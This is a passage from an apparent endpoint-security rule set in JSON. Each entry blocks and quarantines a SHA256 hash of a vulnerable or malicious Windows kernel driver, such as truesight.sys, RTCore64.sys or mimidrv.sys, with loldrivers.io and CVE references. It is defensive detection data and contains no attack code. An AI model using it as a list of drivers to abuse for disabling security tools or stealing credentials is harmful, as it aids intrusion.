"2026-03-23T11:45:30.476720Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9ce5188745ffcb5dc8304dac97cd037360600d8eb4739cfdbfb06bcd0efd72e4", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "47af286e-82b8-5ed2-8f97-ff83ded88a8a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830634Z", + "creation_date": "2026-03-23T11:45:30.830635Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830641Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b19f6fac202bb7f878a79d1be3f8631e5dff44560692235f31deb68710148bec", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "47d3467b-4e82-5941-817e-eaff6e052a0a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150142Z", + "creation_date": "2026-03-23T11:45:31.150144Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150149Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ee768d53efcca87b44c6d6b0e306059acef1a481aa5e02694b8a353890cbf6f9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "47eafdb3-ec10-58cb-800c-26f4596fd205", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477898Z", + "creation_date": "2026-03-23T11:45:31.477902Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477913Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"82d6dc7fae155d0589a55a88a1f91d2ca48f7aaff316390eb70f7598eb1cb659", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "47ec7d52-a4df-5b2f-aa92-c188d6e37d52", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974557Z", + "creation_date": "2026-03-23T11:45:29.974559Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974565Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a553ba125adf00a769718d5cd26ed1a59b5e397956ebc6163973b10fe8c58214", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "47f34d50-d3bc-5bfe-ada1-766c5049aa54", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144020Z", + "creation_date": "2026-03-23T11:45:31.144022Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144028Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "be3eff65d045b8da69a4fff97851914c9593b28eb0e1341752c2b5b6a77b3e60", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "47f47acb-0eeb-5f94-b6dd-bcdce46a3c07", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833561Z", + "creation_date": "2026-03-23T11:45:30.833564Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833573Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "54244d2b495401912a0f7957e11f9b9a275e10237fc2b37c899e453993f3fa33", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "47ffc318-34ec-5cca-8272-5d0a36307a97", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824203Z", + "creation_date": "2026-03-23T11:45:30.824205Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824211Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d52cb77b427ddb1227990d84e670ec4d1dd3e5c87ffe18567fd384eab09ec6ff", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "481457c6-2042-5d84-a37e-4bcf33c2ec79", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:30.823967Z", + "creation_date": "2026-03-23T11:45:30.823969Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823975Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e545e92fbb223dee4b62ff7f9ae11ad06ff36be47b6ca9eb4f40bf6f08de8d21", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "482b0e84-f935-5bed-a66a-76ba67939a18", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144037Z", + "creation_date": "2026-03-23T11:45:32.144039Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144045Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c3d48dddef790a45ef9feaa5978ec90c9cd4b2de4746896c446ffa08d488170a", + "comment": "Malicious Kernel Driver (aka driver_c3d48ddd.sys) [https://www.loldrivers.io/drivers/f6c08b8a-1d25-4bf1-9d4f-5368c1f6cfe7/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + 
"id": "482b9f57-75f4-5c0c-bce6-3bb7c5ce2388", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969558Z", + "creation_date": "2026-03-23T11:45:29.969560Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969566Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a4680fabf606d6580893434e81c130ff7ec9467a15e6534692443465f264d3c9", + "comment": "Vulnerable Kernel Driver (aka HpPortIox64.sys) [https://www.loldrivers.io/drivers/13637210-2e1c-45a4-9f76-fe38c3c34264/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "48364e33-fabb-5d9f-97ea-ccfc5eabf618", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481151Z", + "creation_date": "2026-03-23T11:45:30.481153Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.481159Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "34f26fbfb72329cbb7f25d2b40cb0f553e1a80373972bcdad62c3c6284d5b2b1", + "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4852904d-6fe6-5184-8cfc-08fd494f03ba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828547Z", + "creation_date": "2026-03-23T11:45:31.828549Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828555Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2ea8dd91131592f6017578965305a4caf61e7430e8d2c31ef823e2da45a93a7f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4858ebcf-be21-5624-bffb-4d039a11658d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826629Z", + "creation_date": "2026-03-23T11:45:31.826631Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826640Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "85c83185fc68bf096dad74ab1264417c4f223116e5053043d05bff4b7414b7ea", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "485b4a24-14e8-508f-a5c3-6b068ee699ba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.478910Z", + "creation_date": "2026-03-23T11:45:31.478914Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.478925Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "2b3013268634b4bac0fd3f7ab36c71be8f858c767c5955577ddfe91b5ad22e78", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4860f692-8954-57a0-bfd9-b649e9a60546", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828779Z", + "creation_date": "2026-03-23T11:45:31.828783Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828791Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9450aa820c5a58e5786861e4c5f3df3c96939844a9f134e6b190e71d0ab098f3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4870a635-d182-5af1-b01b-3f4c82e68157", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985251Z", + "creation_date": "2026-03-23T11:45:29.985253Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985258Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cd53f7e910ed37bf11a473c116fc33d7799f25213dd4e0191085040eb45c3e4e", + "comment": "Dangerous Physmem Kernel Driver (aka HwRwDrv.Sys) [https://www.loldrivers.io/drivers/e4609b54-cb25-4433-a75a-7a17f43cec00/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "48715460-90b7-5f09-8c2e-1b5002af8fac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975974Z", + "creation_date": "2026-03-23T11:45:29.975976Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975982Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e2606f272f7ba054df16be464fda57211ef0d14a0d959f9c8dcb0575df1186e4", + "comment": "SystemInformer driver (aka systeminformer.sys, formerly known as kprocesshacker.sys) 
[https://github.com/winsiderss/systeminformer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "487ada8e-895f-5e5a-91f6-6784419a6c68", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979955Z", + "creation_date": "2026-03-23T11:45:29.979958Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979967Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fd8a5313bf63f5013dc126620276fb4f0ef26416db48ee88cbaaca4029df1d73", + "comment": "Vulnerable Kernel Driver (aka nt3.sys) [https://www.loldrivers.io/drivers/d5118882-6cdd-4b06-8bf4-e9818f16137e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "487c563a-517b-5ac7-b02d-c41443bf20ac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469340Z", + "creation_date": "2026-03-23T11:45:30.469343Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": 
true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469352Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "29b3f3f315179d30fbe75de7b59f09bc7452e6b538ff02b5252c3ee7b26eccab", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "487f66f2-e6a4-5d7e-8cd7-33d9656a7c8b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468227Z", + "creation_date": "2026-03-23T11:45:30.468231Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468240Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5ffba52ea8bba7aeaf9fb32e1ba97b5bbd5c31739d594e722d9e89907dbb5cdd", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4887ca8e-4fde-5c0b-af84-6374e77f189a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", 
+ "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607526Z", + "creation_date": "2026-03-23T11:45:29.607528Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607533Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "18712a063574bfec315d58577dfe413ab45b650e54747d1e18a56c3c7337a12c", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "488cc101-b4c4-5838-8a6f-2b030729e9ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973165Z", + "creation_date": "2026-03-23T11:45:29.973167Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973172Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + 
"value": "d378162a47648bed192270ab4ddd67c99b4ebe8093a267fa1fe1e092559504b0", + "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "48a52304-d193-5e83-9d5d-026ae04be497", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472183Z", + "creation_date": "2026-03-23T11:45:30.472186Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472196Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "be683cd38e64280567c59f7dc0a45570abcb8a75f1d894853bbbd25675b4adf7", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "48a9e746-657a-5bec-8196-f3249693a63f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611762Z", + "creation_date": "2026-03-23T11:45:29.611764Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611769Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ded2927f9a4e64eefd09d0caba78e94f309e3a6292841ae81d5528cab109f95d", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz141_x64.sys) [CVE-2017-15303] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "48b6a7d1-ec7b-5400-b308-4bd76608cee3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 